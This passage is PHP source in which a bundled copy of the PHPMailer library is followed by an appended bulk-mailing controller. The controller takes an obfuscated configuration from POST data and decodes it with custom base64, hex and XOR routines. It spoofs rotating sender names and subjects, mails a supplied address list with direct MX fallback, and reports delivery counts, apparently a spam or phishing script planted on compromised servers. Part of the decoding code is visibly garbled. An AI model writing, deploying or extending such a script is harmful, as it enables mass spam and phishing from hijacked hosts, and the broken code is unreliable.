'', 'base64', $match[1])) { $message = str_replace( $images[0][$imgindex], $images[1][$imgindex] . '="cid:' . $cid . '"', $message ); } } elseif (!preg_match('#^[A-z]+://#', $url)) { // Do not change urls for absolute images (thanks to corvuscorax) $filename = basename($url); $directory = dirname($url); if ($directory == '.') { $directory = ''; } $cid = md5($url) . '@phpmailer.0'; // RFC2392 S 2 if (strlen($basedir) > 1 && substr($basedir, -1) != '/') { $basedir .= '/'; } if (strlen($directory) > 1 && substr($directory, -1) != '/') { $directory .= '/'; } if ($this->addEmbeddedImage( $basedir . $directory . $filename, $cid, $filename, 'base64', self::_mime_types((string)self::mb_pathinfo($filename, PATHINFO_EXTENSION)) ) ) { $message = preg_replace( '/' . $images[1][$imgindex] . '=["\']' . preg_quote($url, '/') . '["\']/Ui', $images[1][$imgindex] . '="cid:' . $cid . '"', $message ); } } } } $this->isHTML(true); // Convert all message body line breaks to CRLF, makes quoted-printable encoding work much better $this->Body = $this->normalizeBreaks($message); $this->AltBody = $this->normalizeBreaks($this->html2text($message, $advanced)); if (empty($this->AltBody)) { $this->AltBody = 'To view this email message, open it in a program that understands HTML!' . self::CRLF . self::CRLF; } return $this->Body; } public function html2text($html, $advanced = false) { if (is_callable($advanced)) { return call_user_func($advanced, $html); } return html_entity_decode( trim(custom_strip_tags(preg_replace('/<(head|title|style|script)[^>]*>.*?<\/\\1>/si', '', $html))), ENT_QUOTES, $this->CharSet ); } public static function _mime_types($ext = '') { $mimes = array( 'gif' => 'image/gif', 'jpeg' => 'image/jpeg', 'jpe' => 'image/jpeg', 'jpg' => 'image/jpeg', 'png' => 'image/png', 'tiff' => 'image/tiff', 'tif' => 'image/tiff', ); return (array_key_exists(strtolower($ext), $mimes) ? $mimes[strtolower($ext)]: 'application/octet-stream'); } public static function filenameToType($filename) { // In case the path is a URL, strip any query string before getting extension $qpos = strpos($filename, '?'); if (false !== $qpos) { $filename = substr($filename, 0, $qpos); } $pathinfo = self::mb_pathinfo($filename); return self::_mime_types($pathinfo['extension']); } public static function mb_pathinfo($path, $options = null) { $ret = array('dirname' => '', 'basename' => '', 'extension' => '', 'filename' => ''); $pathinfo = array(); if (preg_match('%^(.*?)[\\\\/]*(([^/\\\\]*?)(\.([^\.\\\\/]+?)|))[\\\\/\.]*$%im', $path, $pathinfo)) { if (array_key_exists(1, $pathinfo)) { $ret['dirname'] = $pathinfo[1]; } if (array_key_exists(2, $pathinfo)) { $ret['basename'] = $pathinfo[2]; } if (array_key_exists(5, $pathinfo)) { $ret['extension'] = $pathinfo[5]; } if (array_key_exists(3, $pathinfo)) { $ret['filename'] = $pathinfo[3]; } } switch ($options) { case PATHINFO_DIRNAME: case 'dirname': return $ret['dirname']; case PATHINFO_BASENAME: case 'basename': return $ret['basename']; case PATHINFO_EXTENSION: case 'extension': return $ret['extension']; case PATHINFO_FILENAME: case 'filename': return $ret['filename']; default: return $ret; } } public function set($name, $value = '') { try { if (isset($this->$name)) { $this->$name = $value; } else { throw new phpmailerException($this->lang('variable_set') . $name, self::STOP_CRITICAL); } } catch (Exception $exc) { $this->setError($exc->getMessage()); if ($exc->getCode() == self::STOP_CRITICAL) { return false; } } return true; } public function secureHeader($str) { return trim(str_replace(array("\r", "\n"), '', $str)); } public static function normalizeBreaks($text, $breaktype = "\r\n") { return preg_replace('/(\r\n|\r|\n)/ms', $breaktype, $text); } public function sign($cert_filename, $key_filename, $key_pass) { $this->sign_cert_file = $cert_filename; $this->sign_key_file = $key_filename; $this->sign_key_pass = $key_pass; } public function DKIM_QP($txt) { $line = ''; for ($i = 0; $i < strlen($txt); $i++) { $ord = ord($txt[$i]); if (((0x21 <= $ord) && ($ord <= 0x3A)) || $ord == 0x3C || ((0x3E <= $ord) && ($ord <= 0x7E))) { $line .= $txt[$i]; } else { $line .= '=' . sprintf('%02X', $ord); } } return $line; } public function DKIM_Sign($signHeader) { if (!defined('PKCS7_TEXT')) { if ($this->exceptions) { throw new phpmailerException($this->lang('signing') . ' OpenSSL extension missing.'); } return ''; } $privKeyStr = file_get_contents($this->DKIM_private); if ($this->DKIM_passphrase != '') { $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase); } else { $privKey = $privKeyStr; } if (openssl_sign($signHeader, $signature, $privKey)) { return base64_encode($signature); } return ''; } public function DKIM_HeaderC($signHeader) { $signHeader = preg_replace('/\r\n\s+/', ' ', $signHeader); $lines = explode("\r\n", $signHeader); foreach ($lines as $key => $line) { list($heading, $value) = explode(':', $line, 2); $heading = strtolower($heading); $value = preg_replace('/\s+/', ' ', $value); // Compress useless spaces $lines[$key] = $heading . ':' . trim($value); // Don't forget to remove WSP around the value } $signHeader = implode("\r\n", $lines); return $signHeader; } public function DKIM_BodyC($body) { if ($body == '') { return "\r\n"; } // stabilize line endings $body = str_replace("\r\n", "\n", $body); $body = str_replace("\n", "\r\n", $body); // END stabilize line endings while (substr($body, strlen($body) - 4, 4) == "\r\n\r\n") { $body = substr($body, 0, strlen($body) - 2); } return $body; } public function DKIM_Add($headers_line, $subject, $body) { $DKIMsignatureType = 'rsa-sha1'; // Signature & hash algorithms $DKIMcanonicalization = 'relaxed/simple'; // Canonicalization of header/body $DKIMquery = 'dns/txt'; // Query method $DKIMtime = time(); // Signature Timestamp = seconds since 00:00:00 - Jan 1, 1970 (UTC time zone) $subject_header = "Subject: $subject"; $headers = explode($this->LE, $headers_line); $from_header = ''; $to_header = ''; $current = ''; foreach ($headers as $header) { if (strpos($header, 'From:') === 0) { $from_header = $header; $current = 'from_header'; } elseif (strpos($header, 'To:') === 0) { $to_header = $header; $current = 'to_header'; } else { if ($current && strpos($header, ' =?') === 0) { $current .= $header; } else { $current = ''; } } } $from = str_replace('|', '=7C', $this->DKIM_QP($from_header)); $to = str_replace('|', '=7C', $this->DKIM_QP($to_header)); $subject = str_replace( '|', '=7C', $this->DKIM_QP($subject_header) ); // Copied header fields (dkim-quoted-printable) $body = $this->DKIM_BodyC($body); $DKIMlen = strlen($body); // Length of body $DKIMb64 = base64_encode(pack('H*', sha1($body))); // Base64 of packed binary SHA-1 hash of body $ident = ($this->DKIM_identity == '') ? '' : ' i=' . $this->DKIM_identity . ';'; $dkimhdrs = 'DKIM-Signature: v=1; a=' . $DKIMsignatureType . '; q=' . $DKIMquery . '; l=' . $DKIMlen . '; s=' . $this->DKIM_selector . ";\r\n" . "\tt=" . $DKIMtime . '; c=' . $DKIMcanonicalization . ";\r\n" . "\th=From:To:Subject;\r\n" . "\td=" . $this->DKIM_domain . ';' . $ident . "\r\n" . "\tz=$from\r\n" . "\t|$to\r\n" . "\t|$subject;\r\n" . "\tbh=" . $DKIMb64 . ";\r\n" . "\tb="; $toSign = $this->DKIM_HeaderC( $from_header . "\r\n" . $to_header . "\r\n" . $subject_header . "\r\n" . $dkimhdrs ); $signed = $this->DKIM_Sign($toSign); return $dkimhdrs . $signed . "\r\n"; } public function getToAddresses() { return $this->to; } public function getCcAddresses() { return $this->cc; } public function getBccAddresses() { return $this->bcc; } public function getReplyToAddresses() { return $this->ReplyTo; } public function getAllRecipientAddresses() { return $this->all_recipients; } protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from) { if (!empty($this->action_function) && is_callable($this->action_function)) { $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from); call_user_func_array($this->action_function, $params); } } } class phpmailerException extends Exception { public function errorMessage() { $errorMsg = '' . $this->getMessage() . "
\n"; return $errorMsg; } } ///////////////////////////////////////////////////////////////// function sendSmtpMail($from_email, $from_name, $to, $subject, $body, $type) { $mail = new PHPMailer(); $mail->isMail(); $mail->CharSet = 'utf-8'; $mail->SetFrom($from_email, $from_name); $mail->AddAddress($to); $mail->Subject = $subject; if ($type == "1") { $mail->MsgHTML($body); } elseif ($type == "2") { $mail->isHTML(false); $mail->Body = $body; } if (isset($_FILES)) { foreach($_FILES as $key => $file) { $mail->addAttachment($file['tmp_name'], $file['name']); } } if (!$mail->send()) { $to_domain = explode("@", $to); $to_domain = $to_domain[1]; $mail->IsSMTP(); $mail->Host = mx_lookup($to_domain); $mail->Port = 25; $mail->SMTPAuth = false; if (!$mail->send()) { return Array(0, $mail->ErrorInfo); } else { return Array(2, 0); } } else { return Array(1, 0); } } function mx_lookup($hostname) { @getmxrr($hostname, $mxhosts, $precedence); if(count($mxhosts) === 0) return '127.0.0.1'; $position = array_keys($precedence, min($precedence)); return $mxhosts[$position[0]]; } function myhex2bin( $str ) { $sbin = ""; $len = strlen( $str ); for ( $i = 0; $i < $len; $i += 2 ) { $sbin .= pack( "H*", substr( $str, $i, 2 ) ); } return $sbin; } function b64d($input) { $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $input = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 & 3) << 6) | $enc4; $output = $output . chr((int) $chr1); if ($enc3 != 64) { $output = $output . chr((int) $chr2); } if ($enc4 != 64) { $output = $output . chr((int) $chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($input)); return $output; } function decode($data, $key) { $out_data = ""; for ($i=0; $i$email) { $theme = $data['s'][array_rand($data['s'])]; $theme = alter_macros($theme); $theme = num_macros($theme); $theme = xnum_macros($theme); $message = $data['l']; $message = alter_macros($message); $message = num_macros($message); $message = xnum_macros($message); $message = fteil_macros($message, $uid); $from = $data['f'][array_rand($data['f'])]; $from = alter_macros($from); $from = num_macros($from); $from = xnum_macros($from); if (strstr($from, "[CUSTOM]") == FALSE) { $from = from_host($from); } else { $from = str_replace("[CUSTOM]", "", $from); } $from_email = explode("<", $from); $from_email = explode(">", $from_email[1]); $from_name = explode("\"", $from); $last_error = sendSmtpMail($from_email[0], $from_name[1], $email, $theme, $message, $data['lt']); if ($last_error[1] === 0) { $good++; } else { $bad++; $good = count($data['e']) - $bad; } } $res["r"]["t"] = $last_error[0]; $res["r"]["e"] = $last_error[1] === FALSE ? 0 : $last_error[1]; $res["r"]["g"] = $good; $res["r"]["b"] = $bad; return serialize($res); } $config = array_values($_POST); $res = type1_send($config[0]); if ($res) { echo $res; } exit();